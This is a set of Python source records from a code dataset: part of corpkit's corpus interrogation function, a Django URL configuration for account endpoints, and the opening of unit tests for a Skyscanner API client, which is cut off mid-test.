isinstance(pattern, STRINGTYPE):\n pattern = [pattern]\n if not case_sensitive:\n pattern = [p.lower() for p in pattern]\n if not concordancing:\n if case_sensitive:\n matches = [m for m in list_of_toks if m in pattern]\n else:\n matches = [m for m in list_of_toks if m.lower() in pattern]\n else:\n matches = []\n for index, token in enumerate(list_of_toks):\n if token in pattern:\n if not split_contractions:\n match = [' '.join(t for t in unsplitter(list_of_toks[:index]))[-140:]]\n else:\n match = [' '.join(t for t in list_of_toks[:index])[-140:]]\n match.append(token)\n if not split_contractions:\n match.append(' '.join(t for t in unsplitter(list_of_toks[index + 1:]))[:140])\n else:\n match.append(' '.join(t for t in list_of_toks[index + 1:])[:140])\n\n matches.append(match)\n if countmode:\n return len(matches)\n else:\n return matches\n\n def tok_ngrams(pattern, list_of_toks, concordancing=False, split_contractions=True):\n import re\n result = []\n list_of_toks = [x for x in list_of_toks if re.search(regex_nonword_filter, x)]\n\n if not split_contractions:\n list_of_toks = unsplitter(list_of_toks)\n \n for i in range(len(list_of_toks)):\n try:\n the_gram = [list_of_toks[i+x] for x in range(gramsize)]\n if any(re.search(pattern, x) for x in the_gram):\n result.append(' '.join(the_gram))\n except IndexError:\n pass\n\n if countmode:\n return len(result)\n\n else:\n result = [i for i in result if result.count(i) > 1]\n return result\n\n def compiler(pattern):\n \"\"\"compile regex or fail gracefully\"\"\"\n if hasattr(pattern, 'pattern'):\n return pattern\n import re\n try:\n if case_sensitive:\n comped = re.compile(pattern)\n else:\n comped = re.compile(pattern, re.IGNORECASE)\n return comped\n except:\n import traceback\n import sys\n from time import localtime, strftime\n exc_type, exc_value, exc_traceback = sys.exc_info()\n lst = traceback.format_exception(exc_type, exc_value, exc_traceback)\n error_message = lst[-1]\n thetime = strftime(\"%H:%M:%S\", localtime())\n print('%s: Query %s' % (thetime, error_message))\n if root:\n return 'Bad query'\n else:\n raise ValueError('%s: Query %s' % (thetime, error_message))\n\n def tok_by_reg(pattern, list_of_toks, concordancing = False, **kwargs):\n \"\"\"search for regex in plaintext corpora\"\"\"\n import re\n comped = compiler(pattern)\n if comped == 'Bad query':\n return 'Bad query'\n if not concordancing:\n matches = [m for m in list_of_toks if re.search(comped, m)]\n else:\n matches = []\n for index, token in enumerate(list_of_toks):\n if re.search(comped, token):\n if not split_contractions:\n match = [' '.join(t for t in unsplitter(list_of_toks[:index]))[-140:]]\n else:\n match = [' '.join(t for t in list_of_toks[:index])[-140:]]\n match.append(re.search(comped, token).group(0))\n if not split_contractions:\n match.append(' '.join(t for t in unsplitter(list_of_toks[index + 1:]))[:140])\n else:\n match.append(' '.join(t for t in list_of_toks[index + 1:])[:140])\n matches.append(match)\n if countmode:\n return len(matches)\n else:\n return matches\n\n def determine_search_func(show):\n \"\"\"Figure out what search function we're using\"\"\"\n\n simple_tregex_mode = False\n statsmode = False\n tree_to_text = False\n\n if search.get('t') and not just_speakers and not kwargs.get('tgrep'):\n if have_java:\n simple_tregex_mode = True\n searcher = None\n else:\n searcher = tgrep_searcher\n optiontext = 'Searching parse trees'\n else:\n if datatype == 'plaintext':\n if any(i.endswith('n') for i in search.keys()):\n optiontext = 'n-grams via plaintext'\n raise NotImplementedError('Use a tokenised or parsed corpus for n-gramming.')\n #searcher = plaintext_ngram\n elif any(i.endswith('w') for i in search.keys()):\n if kwargs.get('regex', True):\n searcher = plaintext_regex_search\n else:\n searcher = plaintext_simple_search\n optiontext = 'Searching plaintext'\n else:\n raise ValueError(\"Plaintext search must be 'w' or 'n'.\")\n\n elif datatype == 'tokens':\n if any(i.endswith('n') for i in search.keys()):\n searcher = tok_ngrams\n optiontext = 'n-grams via tokens'\n elif any(i.endswith('w') for i in search.keys()):\n if kwargs.get('regex', True):\n searcher = tok_by_reg\n else:\n searcher = tok_by_list\n if isinstance(search.get('w'), (list, Wordlist)):\n searcher = tok_by_list\n optiontext = 'Searching tokens'\n only_parse = ['r', 'd', 'g', 'dl', 'gl', 'df', 'gf',\n 'dp', 'gp', 'f', 'd2', 'd2f', 'd2p', 'd2l']\n \n\n if datatype != 'parse' and any(i in only_parse for i in list(search.keys())):\n form = ', '.join(i for i in list(search.keys()) if i in only_parse)\n raise ValueError('Need parsed corpus to search with \"%s\" option(s).' % form)\n\n elif datatype == 'parse':\n if any(i.endswith('n') for i in search.keys()):\n search['w'] = search.pop('n')\n if not show_ngram:\n show = ['n']\n if any(i.endswith('t') for i in search.keys()):\n if have_java and not kwargs.get('tgrep'):\n searcher = slow_tregex\n else:\n searcher = tgrep_searcher\n optiontext = 'Searching parse trees'\n elif any(i.endswith('s') for i in search.keys()):\n searcher = get_stats\n statsmode = True\n optiontext = 'General statistics'\n elif any(i.endswith('r') for i in search.keys()):\n from corpkit.depsearch import dep_searcher\n searcher = dep_searcher\n optiontext = 'Distance from root'\n else:\n from corpkit.depsearch import dep_searcher\n searcher = dep_searcher\n optiontext = 'Dependency querying'\n \n # ngram mode for parsed data\n if show_ngram:\n optiontext = 'N-grams from parsed data'\n searcher = dep_searcher\n\n return searcher, optiontext, simple_tregex_mode, statsmode, tree_to_text\n\n def get_tregex_values():\n \"\"\"If using Tregex, set appropriate values\n\n - Check for valid query\n - Make 'any' query\n - Make list query\n \"\"\"\n\n translated_option = 't'\n if isinstance(search['t'], Wordlist):\n search['t'] = list(search['t'])\n q = tregex_engine(corpus=False,\n query=search.get('t'),\n options=['-t'],\n check_query=True,\n root=root,\n preserve_case=preserve_case\n )\n if q is False:\n if root:\n return 'Bad query', None\n else:\n return 'Bad query', None\n\n if isinstance(search['t'], list):\n regex = as_regex(search['t'], boundaries='line', case_sensitive=case_sensitive)\n else:\n regex = ''\n\n # listquery, anyquery, translated_option\n treg_dict = {'p': [r'__ < (/%s/ !< __)' % regex, r'__ < (/.?[A-Za-z0-9].?/ !< __)', 'u'],\n 'pl': [r'__ < (/%s/ !< __)' % regex, r'__ < (/.?[A-Za-z0-9].?/ !< __)', 'u'],\n 'x': [r'__ < (/%s/ !< __)' % regex, r'__ < (/.?[A-Za-z0-9].?/ !< __)', 'u'],\n 't': [r'__ < (/%s/ !< __)' % regex, r'__ < (/.?[A-Za-z0-9].?/ !< __)', 'o'],\n 'w': [r'/%s/ !< __' % regex, r'/.?[A-Za-z0-9].?/ !< __', 't'],\n 'c': [r'/%s/ !< __' % regex, r'/.?[A-Za-z0-9].?/ !< __', 'C'],\n 'l': [r'/%s/ !< __' % regex, r'/.?[A-Za-z0-9].?/ !< __', 't']\n }\n\n listq, anyq, translated_option = treg_dict.get(show[0].lower())\n if isinstance(search['t'], list):\n search['t'] = listq\n elif search['t'] == 'any': \n search['t'] = anyq\n return search['t'], translated_option\n\n def plaintext_regex_search(pattern, plaintext_data, concordancing=False, **kwargs):\n \"\"\"search for regex in plaintext corpora\n\n it searches over lines, so the user needs to be careful.\n \"\"\"\n import re\n if concordancing:\n pattern = r'(.{,140})\\b(' + pattern + r')\\b(.{,140})'\n compiled_pattern = compiler(pattern)\n if compiled_pattern == 'Bad query':\n return 'Bad query'\n matches = re.findall(compiled_pattern, plaintext_data)\n if concordancing:\n matches = [list(m) for m in matches]\n if not concordancing:\n for index, i in enumerate(matches):\n if isinstance(i, tuple):\n matches[index] = i[0]\n if countmode:\n return len(matches)\n else:\n return matches\n\n def correct_spelling(a_string):\n \"\"\"correct spelling within a string\"\"\"\n if not spelling:\n return a_string\n from corpkit.dictionaries.word_transforms import usa_convert\n if spelling.lower() == 'uk':\n usa_convert = {v: k for k, v in list(usa_convert.items())}\n bits = a_string.split('/')\n for index, i in enumerate(bits):\n converted = usa_convert.get(i.lower(), i)\n if i.islower() or preserve_case is False:\n converted = converted.lower()\n elif i.isupper() and preserve_case:\n converted = converted.upper()\n elif i.istitle() and preserve_case:\n converted = converted.title()\n bits[index] = converted\n r = '/'.join(bits)\n return r\n\n def plaintext_simple_search(pattern, plaintext_data, concordancing=False, **kwargs):\n \"\"\"search for tokens in plaintext corpora\"\"\"\n import re\n result = []\n if isinstance(pattern, STRINGTYPE):\n pattern = [pattern]\n for p in pattern:\n if concordancing:\n pat = r'(.{0,140})\\b(' + re.escape(p) + r')\\b(.{0,140})'\n pat = compiler(pat)\n if pat == 'Bad query':\n return 'Bad query'\n matches = re.findall(pat, plaintext_data)\n if concordancing:\n matches = [list(m) for m in matches]\n for i in matches:\n result.append(i)\n else: \n for m in range(len(matches)):\n result.append(p)\n return result\n\n def make_search_iterable(corpus):\n \"\"\"determine how to structure the corpus for interrogation\"\"\"\n \n # skip file definitions if they are not needed\n if simple_tregex_mode:\n if corpus.level in ['s', 'f']:\n return {(corpus.name, corpus.path): False}\n else:\n return {(os.path.basename(i), os.path.join(corpus.path, i)): False\n for i in os.listdir(corpus.path)\n if os.path.isdir(os.path.join(corpus.path, i))}\n\n if isinstance(corpus, Datalist):\n to_iterate_over = {}\n # it could be files or subcorpus objects\n if corpus[0].level == 's':\n if files_as_subcorpora:\n for subc in corpus:\n for f in subc.files:\n to_iterate_over[(f.name, f.path)] = [f]\n else:\n for subc in corpus:\n to_iterate_over[(subc.name, subc.path)] = subc.files\n elif corpus[0].level == 'f':\n for f in corpus:\n to_iterate_over[(f.name, f.path)] = [f]\n elif corpus.singlefile:\n to_iterate_over = {(corpus.name, corpus.path): [corpus]}\n elif not hasattr(corpus, 'subcorpora') or not corpus.subcorpora:\n # just files in a directory\n if files_as_subcorpora:\n to_iterate_over = {}\n for f in corpus.files:\n to_iterate_over[(f.name, f.path)] = [f]\n else:\n to_iterate_over = {(corpus.name, corpus.path): corpus.files}\n else:\n to_iterate_over = {}\n if files_as_subcorpora:\n # don't know if possible: has subcorpora but also .files\n if hasattr(corpus, 'files') and corpus.files is not None:\n for f in corpus.files:\n to_iterate_over[(f.name, f.path)] = [f]\n # has subcorpora with files in those\n elif hasattr(corpus, 'files') and corpus.files is None:\n for subc in corpus.subcorpora:\n for f in subc.files:\n to_iterate_over[(f.name, f.path)] = [f]\n else:\n if corpus[0].level == 's':\n for subcorpus in corpus:\n to_iterate_over[(subcorpus.name, subcorpus.path)] = subcorpus.files\n elif corpus[0].level == 'f':\n for f in corpus:\n to_iterate_over[(f.name, f.path)] = [f]\n else:\n for subcorpus in corpus.subcorpora:\n to_iterate_over[(subcorpus.name, subcorpus.path)] = subcorpus.files\n return to_iterate_over\n\n def welcome_printer(return_it=False):\n \"\"\"Print welcome message\"\"\"\n if no_conc:\n message = 'Interrogating'\n else:\n message = 'Interrogating and concordancing'\n if kwargs.get('printstatus', True):\n thetime = strftime(\"%H:%M:%S\", localtime())\n from corpkit.constants import transshow, transobjs\n sformat = '\\n'\n for k, v in search.items():\n if k == 't':\n dratt = ''\n else:\n dratt = transshow.get(k[-1], k[-1])\n drole = transobjs.get(k[0], k[0])\n if k == 't':\n drole = 'Trees'\n vform = getattr(v, 'pattern', v)\n sformat += ' %s %s: %s\\n' % (drole, dratt.lower(), vform)\n if search.get('s'):\n sformat = 'Features'\n welcome = ('\\n%s: %s %s ...\\n %s\\n ' \\\n 'Query: %s\\n %s corpus ... \\n' % \\\n (thetime, message, cname, optiontext, sformat, message))\n if return_it:\n return welcome\n else:\n print(welcome)\n\n def goodbye_printer(return_it=False, only_conc=False):\n \"\"\"Say goodbye before exiting\"\"\"\n if not kwargs.get('printstatus', True):\n return\n thetime = strftime(\"%H:%M:%S\", localtime())\n if only_conc:\n \n show_me = (thetime, len(conc_df))\n finalstring = '\\n\\n%s: Concordancing finished! %d results.' % show_me\n else:\n finalstring = '\\n\\n%s: Interrogation finished!' % thetime\n if countmode:\n finalstring += ' %d matches.' % tot\n else:\n dat = (numentries, total_total)\n finalstring += ' %d unique results, %d total occurrences.' % dat\n if return_it:\n return finalstring\n else:\n print(finalstring)\n\n\n def make_conc_obj_from_conclines(conc_results):\n \"\"\"\n Turn conclines into DataFrame\n \"\"\"\n from corpkit.interrogation import Concordance\n all_conc_lines = []\n for sc_name, resu in sorted(conc_results.items()):\n if only_unique:\n unique_results = uniquify(resu)\n else:\n unique_results = resu\n #make into series\n if PYTHON_VERSION == 2:\n pindex = 'c f s l m r'.encode('utf-8').split()\n else:\n pindex = 'c f s l m r'.split()\n for fname, spkr, start, word, end in unique_results:\n #spkr = str(spkr, errors = 'ignore')\n fname = os.path.basename(fname)\n ser = [sc_name, fname, spkr, start, word, end]\n all_conc_lines.append(Series(ser, index=pindex))\n\n if random:\n from random import shuffle\n shuffle(all_conc_lines)\n\n try:\n conc_df = pd.concat(all_conc_lines, axis=1).T\n if all(x == '' for x in list(conc_df['s'].values)):\n conc_df.drop('s', axis=1, inplace=True)\n \n if show_ngram or show_collocates:\n if not language_model:\n counted = Counter(conc_df['m'])\n indices = [l for l in list(conc_df.index) if counted[conc_df.ix[l]['m']] > 1] \n conc_df = conc_df.ix[indices]\n conc_df = conc_df.reset_index(drop=True)\n\n locs['corpus'] = corpus.name\n conc_df = Concordance(conc_df)\n try:\n conc_df.query = locs\n except AttributeError:\n pass\n return conc_df\n\n except ValueError:\n return\n\n def make_progress_bar():\n \"\"\"generate a progress bar\"\"\"\n\n if simple_tregex_mode:\n total_files = len(list(to_iterate_over.keys()))\n else:\n total_files = sum(len(x) for x in list(to_iterate_over.values()))\n\n par_args = {'printstatus': kwargs.get('printstatus', True),\n 'root': root, \n 'note': note,\n 'length': total_files,\n 'startnum': kwargs.get('startnum'),\n 'denom': kwargs.get('denominator', 1)}\n\n term = None\n if kwargs.get('paralleling', None) is not None:\n from blessings import Terminal\n term = Terminal()\n par_args['terminal'] = term\n par_args['linenum'] = kwargs.get('paralleling')\n\n if in_notebook:\n par_args['welcome_message'] = welcome_message\n\n outn = kwargs.get('outname', '')\n if outn:\n outn = outn + ': '\n\n tstr = '%s%d/%d' % (outn, current_iter, total_files)\n p = animator(None, None, init=True, tot_string=tstr, **par_args)\n tstr = '%s%d/%d' % (outn, current_iter + 1, total_files)\n animator(p, current_iter, tstr, **par_args)\n return p, outn, total_files, par_args\n\n # find out if using gui\n root = kwargs.get('root')\n note = kwargs.get('note')\n language_model = kwargs.get('language_model')\n\n # set up pause method\n original_sigint = signal.getsignal(signal.SIGINT)\n if kwargs.get('paralleling', None) is None:\n original_sigint = signal.getsignal(signal.SIGINT)\n signal.signal(signal.SIGINT, signal_handler)\n\n # find out about concordancing\n only_conc = False\n no_conc = False\n if conc is False:\n no_conc = True\n if isinstance(conc, str) and conc.lower() == 'only':\n only_conc = True\n no_conc = False\n numconc = 0\n\n # wipe non essential class attributes to not bloat query attrib\n if isinstance(corpus, Corpus):\n import copy\n corpus = copy.copy(corpus)\n for k, v in corpus.__dict__.items():\n if isinstance(v, (Interrogation, Interrodict)):\n corpus.__dict__.pop(k, None)\n\n # convert path to corpus object\n if not isinstance(corpus, (Corpus, Corpora, Subcorpus, File, Datalist)):\n if not multiprocess and not kwargs.get('outname'):\n corpus = Corpus(corpus, print_info=False)\n\n # figure out how the user has entered the query and show, and normalise\n from corpkit.process import searchfixer\n search = searchfixer(search, query)\n show = fix_show(show)\n \n show_ngram = any(x.startswith('n') for x in show)\n show_collocates = any(x.startswith('b') for x in show)\n\n # instantiate lemmatiser if need be\n if 'l' in show and isinstance(search, dict) and search.get('t'):\n from nltk.stem.wordnet import WordNetLemmatizer\n lmtzr = WordNetLemmatizer()\n\n # do multiprocessing if need be\n im, corpus, search, query, just_speakers = is_multiquery(corpus, search, query, just_speakers)\n\n # figure out if we can multiprocess the corpus\n if hasattr(corpus, '__iter__') and im:\n corpus = Corpus(corpus)\n if hasattr(corpus, '__iter__') and not im:\n im = True\n if isinstance(corpus, Corpora):\n im = True\n\n # split corpus if the user wants multiprocessing but no other iterable\n if not im and multiprocess:\n im = True\n corpus = corpus[:]\n\n search = fix_search(search)\n exclude = fix_search(exclude)\n\n # if it's already been through pmultiquery, don't do it again\n locs['search'] = search\n locs['query'] = query\n locs['just_speakers'] = just_speakers\n locs['corpus'] = corpus\n locs['multiprocess'] = multiprocess\n locs['print_info'] = kwargs.get('printstatus', True)\n\n # send to multiprocess function\n if im:\n signal.signal(signal.SIGINT, original_sigint)\n from corpkit.multiprocess import pmultiquery\n return pmultiquery(**locs)\n\n # get corpus metadata\n cname = corpus.name\n if isinstance(save, STRINGTYPE):\n savename = corpus.name + '-' + save\n if save is True:\n raise ValueError('save must be str, not bool.')\n\n\n datatype = getattr(corpus, 'datatype', 'parse')\n singlefile = getattr(corpus, 'singlefile', False)\n level = getattr(corpus, 'level', 'c')\n \n # store all results in here\n results = {}\n count_results = {}\n conc_results = {}\n\n # check if just counting, turn off conc if so\n countmode = 'c' in show\n if countmode:\n no_conc = True\n only_conc = False\n # where we are at in interrogation\n current_iter = 0\n\n # multiprocessing progress bar\n denom = kwargs.get('denominator', 1)\n startnum = kwargs.get('startnum', 0)\n\n # Determine the search function to be used #\n searcher, optiontext, simple_tregex_mode, statsmode, tree_to_text = determine_search_func(show)\n \n # no conc for statsmode\n if statsmode:\n no_conc = True\n only_conc = False\n conc = False\n\n # Set some Tregex-related values\n if search.get('t'):\n if show_ngram:\n raise ValueError(\"Can't search trees for n-grams---use a dependency search.\")\n query, translated_option = get_tregex_values()\n if query == 'Bad query' and translated_option is None:\n if root:\n return 'Bad query'\n else:\n return\n # more tregex options\n if tree_to_text:\n treg_q = r'ROOT << __'\n op = ['-o', '-t', '-w']\n elif simple_tregex_mode:\n treg_q = search['t']\n op = ['-o', '-' + translated_option]\n\n # make iterable object for corpus interrogation\n to_iterate_over = make_search_iterable(corpus)\n\n from traitlets import TraitError\n try:\n from ipywidgets import IntProgress\n\n _ = IntProgress(min=0, max=10, value=1)\n in_notebook = True\n except TraitError:\n in_notebook = False\n except ImportError:\n in_notebook = False\n\n # print welcome message\n welcome_message = welcome_printer(return_it=in_notebook)\n\n # create a progress bar\n p, outn, total_files, par_args = make_progress_bar()\n\n # Iterate over data, doing interrogations\n for (subcorpus_name, subcorpus_path), files in sorted(to_iterate_over.items()):\n\n # results for subcorpus go here\n conc_results[subcorpus_name] = []\n count_results[subcorpus_name] = []\n results[subcorpus_name] = Counter()\n\n # get either everything (tree_to_text) or the search['t'] query\n if tree_to_text or simple_tregex_mode:\n result = tregex_engine(query=treg_q,\n options=op,\n corpus=subcorpus_path,\n root=root,\n preserve_case=preserve_case\n )\n\n # format search results with slashes etc\n if not countmode and not tree_to_text:\n result = format_tregex(result)\n\n # if concordancing, do the query again with 'whole' sent and fname\n if not no_conc:\n ops = ['-w', '-f'] + op\n whole_result = tregex_engine(query=search['t'],\n options=ops,\n corpus=subcorpus_path,\n root=root,\n preserve_case=preserve_case\n )\n for line in whole_result:\n line.insert(1, '') \n\n # format match too depending on option\n if not only_format_match:\n whole_result = format_tregex(whole_result, whole=True)\n\n # make conc lines from conc results\n conc_result = make_conc_lines_from_whole_mid(whole_result, result)\n for lin in conc_result:\n if numconc < maxconc or not maxconc:\n conc_results[subcorpus_name].append(lin)\n numconc += 1\n\n # add matches to ongoing counts\n if countmode:\n count_results[subcorpus_name] += [result] \n else:\n result = Counter(result)\n results[subcorpus_name] += result\n\n # update progress bar\n current_iter += 1\n tstr = '%s%d/%d' % (outn, current_iter + 1, total_files)\n animator(p, current_iter, tstr, **par_args)\n\n # dependencies, plaintext, tokens, slow_tregex and tree_to_text\n if not simple_tregex_mode:\n for f in files:\n slow_treg_speaker_guess = kwargs.get('outname', False)\n if datatype == 'parse' and not tree_to_text:\n # right now, this is not using the File class's read() or document\n # methods. the reason is that there seem to be memory leaks. these\n # may have been fixed already though.\n try:\n from corenlp_xml import Document\n except ImportError:\n from corenlp_xml.document import Document\n with codecs.open(f.path, 'rb') as fo:\n data = fo.read()\n corenlp_xml = Document(data)\n #corenlp_xml = f.document\n if just_speakers:\n import re\n if isinstance(just_speakers, re._pattern_type):\n sents = [s for s in corenlp_xml.sentences if \\\n re.search(just_speakers, get_speakername(s))]\n else:\n sents = [s for s in corenlp_xml.sentences if get_speakername(s) in just_speakers]\n if len(just_speakers) == 1:\n slow_treg_speaker_guess = just_speakers[0]\n else:\n sents = corenlp_xml.sentences\n\n # get coreferences\n if kwargs.get('coref') or any(x.startswith('h') for x in show):\n if just_speakers:\n corefs = [i for i in corenlp_xml.coreferences if any(x == i.sentence for x in sents)]\n else:\n corefs = corenlp_xml.coreferences\n else:\n corefs = []\n \n corenlp_xml = None\n\n res, conc_res = searcher(sents, search=search, show=show,\n dep_type=dep_type,\n exclude=exclude,\n excludemode=excludemode,\n searchmode=searchmode,\n case_sensitive=case_sensitive,\n conc=conc,\n only_format_match=only_format_match,\n speaker=slow_treg_speaker_guess,\n gramsize=gramsize,\n no_punct=no_punct,\n no_closed=no_closed,\n whitelist=whitelist,\n split_contractions=split_contractions,\n window=window,\n filename=f.name,\n language_model=language_model,\n corefs=corefs,\n is_a_word=is_a_word,\n **kwargs\n )\n \n if res == 'Bad query':\n return 'Bad query'\n\n if datatype == 'tokens':\n import pickle\n with codecs.open(f.path, \"rb\") as fo:\n data = pickle.load(fo)\n elif datatype == 'plaintext' or tree_to_text:\n if tree_to_text:\n data = '\\n'.join(result)\n if not split_contractions:\n data = unsplitter(data)\n else:\n with codecs.open(f.path, 'rb', encoding='utf-8') as data:\n data = data.read()\n\n if datatype == 'tokens' or datatype == 'plaintext':\n\n query = list(search.values())[0]\n\n if not only_conc:\n res = searcher(query,\n data,\n split_contractions=split_contractions, \n concordancing=False\n )\n if res == 'Bad query':\n if root:\n return 'Bad query'\n if not no_conc:\n conc_res = searcher(query,\n data,\n split_contractions=split_contractions, \n concordancing=True\n )\n if conc_res == 'Bad query':\n if root:\n return 'Bad query'\n for line in conc_res:\n line.insert(0, '')\n\n if countmode:\n count_results[subcorpus_name] += [res]\n\n else:\n # add filename and do lowercasing for conc\n if not no_conc:\n for line in conc_res:\n if searcher != slow_tregex and searcher != tgrep_searcher:\n line.insert(0, f.name)\n else:\n line[0] = f.name\n if not preserve_case:\n line[3:] = [x.lower() for x in line[3:]]\n if spelling:\n line = [correct_spelling(b) for b in line]\n if numconc < maxconc or not maxconc:\n conc_results[subcorpus_name].append(line)\n numconc += 1\n\n # do lowercasing and spelling\n if not only_conc:\n if not preserve_case:\n if not statsmode:\n res = [i.lower() for i in res]\n\n if spelling:\n if not statsmode:\n res = [correct_spelling(r) for r in res]\n #if not statsmode:\n results[subcorpus_name] += Counter(res)\n #else:\n #results[subcorpus_name] += res\n\n # update progress bar\n current_iter += 1\n tstr = '%s%d/%d' % (outn, current_iter + 1, total_files)\n animator(p, current_iter, tstr, **par_args)\n\n # Get concordances into DataFrame, return if just conc\n if not no_conc:\n # fail on this line with typeerror if no results?\n conc_df = make_conc_obj_from_conclines(conc_results)\n\n if only_conc:\n locs = sanitise_dict(locs)\n try:\n conc_df.query = locs\n except AttributeError:\n return conc_df\n if save and not kwargs.get('outname'):\n print('\\n')\n conc_df.save(savename)\n goodbye_printer(only_conc=True)\n signal.signal(signal.SIGINT, original_sigint) \n return conc_df\n else:\n conc_df = None\n\n # Get interrogation into DataFrame\n if countmode:\n df = Series({k: sum(v) for k, v in sorted(count_results.items())})\n tot = df.sum()\n else:\n the_big_dict = {}\n unique_results = set(item for sublist in list(results.values()) for item in sublist)\n sortres = sorted(results.items(), key=lambda x: x[0])\n for word in unique_results:\n the_big_dict[word] = [subcorp_result[word] for _, subcorp_result in sortres]\n # turn master dict into dataframe, sorted\n df = DataFrame(the_big_dict, index=sorted(results.keys()))\n\n # for ngrams, remove hapaxes\n if show_ngram or show_collocates:\n if not language_model:\n df = df[[i for i in list(df.columns) if df[i].sum() > 1]]\n\n numentries = len(df.columns)\n tot = df.sum(axis=1)\n total_total = df.sum().sum()\n\n # turn df into series if all conditions met\n if not countmode:\n if level == 's' or singlefile:\n if not files_as_subcorpora:\n if not kwargs.get('df1_always_df'):\n df = Series(df.ix[0])\n df.sort_values(ascending=False, inplace=True)\n tot = df.sum()\n numentries = len(df.index)\n total_total = tot\n\n # turn data into DF for GUI if need be\n if isinstance(df, Series) and kwargs.get('df1_always_df'):\n total_total = df.sum()\n df = DataFrame(df)\n tot = Series(total_total, index=['Total'])\n\n # if we're doing files as subcorpora, we can remove the .txt.xml etc\n if isinstance(df, DataFrame) and files_as_subcorpora:\n cname = corpus.name.replace('-stripped', '').replace('-parsed', '')\n edits = [(r'(-[0-9][0-9][0-9])?\\.txt\\.xml', ''),\n (r'-%s(-stripped)?(-parsed)?' % cname, '')]\n from corpkit.editor import editor\n df = editor(df, replace_subcorpus_names=edits).results\n tot = df.sum(axis=1)\n total_total = df.sum().sum()\n\n # sort by total\n if isinstance(df, DataFrame):\n if not df.empty: \n df = df[list(df.sum().sort_values(ascending=False).index)]\n\n # make interrogation object\n locs['corpus'] = corpus.path\n locs = sanitise_dict(locs)\n interro = Interrogation(results=df, totals=tot, query=locs, concordance=conc_df)\n\n # save it\n if save and not kwargs.get('outname'):\n print('\\n')\n interro.save(savename)\n \n goodbye = goodbye_printer(return_it=in_notebook)\n if in_notebook:\n try:\n p.children[2].value = goodbye.replace('\\n', '')\n except AttributeError:\n pass\n signal.signal(signal.SIGINT, original_sigint)\n return interro\n","sub_path":"corpkit/interrogator.py","file_name":"interrogator.py","file_ext":"py","file_size_in_byte":55944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"104756821","text":"from django.conf.urls import url\nfrom django.contrib import admin\n\nfrom .views import (\n\tUserCreateAPIView,\n\tUserLoginAPIView,\n\tActivateAPIView,\n\tActivateListAPIView,\n\t)\n\nurlpatterns = [\n\turl(r'^login/$', UserLoginAPIView.as_view(), name='login'),\n\turl(r'^register/$', UserCreateAPIView.as_view(), name='register'),\n\turl(r'^activate/list/(?P[\\w-]+)/$', ActivateAPIView.as_view(), name='activate'),\n\turl(r'^activate/list/$', ActivateListAPIView.as_view(), name='activate_list'),\n]\n","sub_path":"employeerest/company2/accounts/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"112822746","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_skyscanner\n----------------------------------\n\nTests for `skyscanner` module.\n\"\"\"\n\nimport unittest\nimport json\nfrom datetime import datetime, timedelta\nfrom requests import HTTPError\n\nfrom skyscanner.skyscanner import (Flights, Transport, FlightsCache, CarHire, Hotels,\n EmptyResponse, ResponseError, STRICT, GRACEFUL, IGNORE)\n\n\nclass SkyScannerTestCase(unittest.TestCase):\n \"\"\"Generic TestCase class to support default failure messages.\"\"\"\n\n def setUp(self):\n self.api_key = 'prtl6749387986743898559646983194'\n self.result = None\n\n def tearDown(self):\n self.result = None\n\n def assertTrue(self, expr, msg=None):\n default_message = ('API Response: %s' % self.result) if self.result else None\n super(SkyScannerTestCase, self).assertTrue(expr, msg=msg or default_message)\n\n\nclass FakeResponse(object):\n\n def __init__(self, status_code=200, content=None):\n self.content = content or ''\n self.status_code = status_code\n\n def json(self):\n return json.loads(self.content)\n\n\nclass TestTransport(SkyScannerTestCase):\n\n def test_create_session(self):\n with self.assertRaises(NotImplementedError):\n Transport(self.api_key).create_session()\n\n def test_with_error_handling_strict(self):\n with self.assertRaises(RuntimeError):\n Transport._with_error_handling(FakeResponse(), RuntimeError, STRICT)\n\n with self.assertRaises(HTTPError):\n Transport._with_error_handling(FakeResponse(status_code=404), HTTPError(), STRICT)\n\n with self.assertRaises(HTTPError) as e:\n Transport._with_error_handling(FakeResponse(status_code=429), HTTPError('429: '), STRICT)\n self.assertEqual(e.message, '429: Too many requests in the last minute.')\n\n with self.assertRaises(HTTPError) as e:\n Transport._with_error_handling(FakeResponse(status_code=400), HTTPError('400'), STRICT)\n self.assertEqual(e.message, '400')\n\n with self.assertRaises(HTTPError) as e:\n Transport._with_error_handling(FakeResponse(status_code=400,\n content='{\"ValidationErrors\": '\n '[{\"Message\": \"1\"}, {\"Message\": \"2\"}]}'),\n HTTPError('400'), STRICT)\n self.assertEqual(e.message, '400: %s' % '\\n\\t'.join(['1', '2']))\n\n def test_with_error_handling_graceful(self):\n result = Transport._with_error_handling(FakeResponse(), EmptyResponse(), GRACEFUL)\n self.assertIsNone(result)\n\n result = Transport._with_error_handling(FakeResponse(content='{\"valid\": 1}', status_code=429),\n HTTPError(), GRACEFUL)\n self.assertIsNotNone(result)\n self.assertTrue('valid' in result)\n self.assertEqual(result['valid'], 1)\n\n result = Transport._with_error_handling(FakeResponse(content='invalid', status_code=429),\n HTTPError(), GRACEFUL)\n self.assertIsNone(result)\n\n with self.assertRaises(HTTPError):\n Transport._with_error_handling(FakeResponse(), HTTPError(), GRACEFUL)\n with self.assertRaises(RuntimeError):\n Transport._with_error_handling(FakeResponse(), RuntimeError(), GRACEFUL)\n\n def test_with_error_handling_ignore(self):\n result = Transport._with_error_handling(FakeResponse(), EmptyResponse(), IGNORE)\n self.assertIsNone(result)\n result = Transport._with_error_handling(FakeResponse(), RuntimeError(), IGNORE)\n self.assertIsNone(result)\n result = Transport._with_error_handling(FakeResponse(), HTTPError(), IGNORE)\n self.assertIsNone(result)\n\n result = Transport._with_error_handling(FakeResponse(content='{\"valid\": 1}'), HTTPError(), IGNORE)\n self.assertIsNotNone(result)\n self.assertTrue('valid' in result)\n self.assertEqual(result['valid'], 1)\n\n def test_default_resp_callback(self):\n with self.assertRaises(EmptyResponse):\n Transport._default_resp_callback(None)\n with self.assertRaises(EmptyResponse):\n Transport._default_resp_callback(FakeResponse(content=''))\n\n with self.assertRaises(ValueError):\n Transport._default_resp_callback(FakeResponse(content='invalid json'))\n\n with self.assertRaises(ResponseError) as e:\n Transport._default_resp_callback(FakeResponse(content='{\"errors\": [\"Wrong API key\", \"Another error\"]}'))\n self.assertEqual(e.message, 